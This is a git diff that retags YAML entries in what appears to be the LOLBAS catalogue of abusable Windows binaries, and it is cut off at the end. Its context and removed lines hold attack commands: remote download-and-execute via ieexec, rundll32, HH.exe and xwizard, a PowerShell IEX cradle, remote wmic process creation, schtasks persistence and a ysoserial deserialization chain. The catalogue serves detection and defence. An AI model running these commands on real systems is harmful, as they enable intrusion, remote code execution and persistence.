diff --git a/yml/OSBinaries/Addinutil.yml b/yml/OSBinaries/Addinutil.yml index 7ff3145..2556476 100644 --- a/yml/OSBinaries/Addinutil.yml +++ b/yml/OSBinaries/Addinutil.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetObjets + - Execute: .NetObjects Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe diff --git a/yml/OSBinaries/At.yml b/yml/OSBinaries/At.yml index 1239772..80c5faa 100644 --- a/yml/OSBinaries/At.yml +++ b/yml/OSBinaries/At.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.002 OperatingSystem: Windows 7 or older Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index bccde85..5bd76aa 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -22,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: INF + - Execute: Remote Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index 3dca837..cd076da 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: "conhost.exe --headless calc.exe" Description: Execute calc.exe with conhost.exe as parent process Usecase: Specify --headless parameter to hide child process window (if applicable) @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\conhost.exe Detection: diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index e0a46a3..d8beeea 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Application: GUI + - Execute: .NetObjects Full_Path: - Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index e861cd2..fd09acc 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -11,8 +11,9 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. + Tags: + - Execute: EXE + - Application: GUI Usecase: Execute process with HH.exe Category: Execute Privileges: User @@ -20,7 +21,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: HH.exe http://some.url/payload.chm + - Application: GUI Description: Executes a remote payload.chm file which can contain commands. Usecase: Execute commands with HH.exe Category: Execute diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 3b659dd..f397b37 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -23,7 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - - Execute: .NetEXE + - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 8a07010..c9f29fe 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -12,8 +12,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting @@ -22,8 +22,8 @@ Commands: MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL - - Execute: .NetEXE + - Execute: DLL (.NET) + - Execute: EXE (.NET) - Command: InstallUtil.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Jsc.yml b/yml/OSBinaries/Jsc.yml index b4e7198..3a5f5a6 100644 --- a/yml/OSBinaries/Jsc.yml +++ b/yml/OSBinaries/Jsc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript - Command: jsc.exe /t:library Library.js Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -21,7 +21,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: JScript Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index 5d76aca..cd12895 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -22,8 +22,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -32,8 +31,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 Tags: - - Execute: VB.Net - - Execute: Csharp + - Execute: XOML Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7cbe41a..dab5e49 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: mmc.exe gpedit.msc Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. @@ -20,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1218.014 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index da29e92..04ff916 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe project.csproj Description: Build and execute a C# project stored in the target csproj file. Usecase: Compile and run code @@ -21,7 +21,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: Csharp + - Execute: CSharp - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo Description: Executes generated Logger DLL file with TargetLogger export Usecase: Execute DLL @@ -39,7 +39,7 @@ Commands: MitreID: T1127.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: XSL - Command: msbuild.exe @sample.rsp Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Usecase: Bypass command-line based detections diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 92390c1..7de2d33 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -51,6 +51,8 @@ Commands: MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: + - Execute: MSI + - Execute: MST - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 00863c9..a5314d1 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 1e6d760..b1fde20 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting @@ -21,7 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 5d60b29..d1941d1 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -22,15 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -40,15 +32,6 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: JScript - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Tags: - - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -75,8 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL - - Execute: EXE + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 535aeff..330ae0d 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index 82f9ab2..a938e76 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -21,7 +21,7 @@ Commands: MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 2fbd1f6..975c831 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 27a9f12..7b12cf3 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - - Execute: EXE + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -21,7 +21,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 10 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 3d0cdd5..2ab7e48 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index e42e6b7..55724db 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 49d52ef..5cb953c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -30,7 +30,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index e7d9b93..f7fbc3c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL + - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet diff --git a/yml/OSBinaries/msedgewebview2.yml b/yml/OSBinaries/msedgewebview2.yml index e9ce1bd..57a163a 100644 --- a/yml/OSBinaries/msedgewebview2.yml +++ b/yml/OSBinaries/msedgewebview2.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -30,7 +30,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Usecase: Proxy execution of binary @@ -39,7 +39,7 @@ Commands: MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe Detection: diff --git a/yml/OSBinaries/wt.yml b/yml/OSBinaries/wt.yml index a96fe54..b83e0e7 100644 --- a/yml/OSBinaries/wt.yml +++ b/yml/OSBinaries/wt.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1202 OperatingSystem: Windows 11 Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe Detection: diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 6ee5a3f..e75c0a6 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\ieframe.dll - Path: c:\windows\syswow64\ieframe.dll diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 7514068..52e973e 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL Full_Path: - Path: c:\windows\system32\shdocvw.dll - Path: c:\windows\syswow64\shdocvw.dll diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 29b58e9..608f69d 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -21,7 +21,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: EXE + - Execute: URL - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. Usecase: Load an executable payload by specifying the file protocol handler (obfuscated). diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 250f100..a57f1b9 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 59a4a8c..b23da74 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 783eea7..963cf0b 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -12,7 +12,6 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 Tags: - - Execute: EXE - Execute: CMD Full_Path: - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 10e39e5..7f71efb 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216.002 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: Powershell + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs Detection: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 5e16964..cb86feb 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 5f0e156..7e375cc 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -32,8 +32,7 @@ Commands: MitreID: T1220 OperatingSystem: Windows 10, Windows 11 Tags: - - Execute: CMD - - Execute: Remote + - Execute: XSL Full_Path: - Path: C:\Windows\System32\winrm.vbs - Path: C:\Windows\SysWOW64\winrm.vbs diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 4014064..23154c1 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -21,7 +21,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: .NetDLL + - Execute: DLL (.NET) Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 3517a54..5e95bac 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows 10 Tags: - - Execute: Powershell + - Execute: PowerShell - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index bae245e..2a15866 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows Tags: - - Execute: Csharp + - Execute: CSharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index 61b19ef..a72e4b6 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1218 OperatingSystem: Windows Tags: - - Execute: EXE + - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 952594d..f6f9eea 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - - Execute: EXE + - Execute: CMD - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -21,7 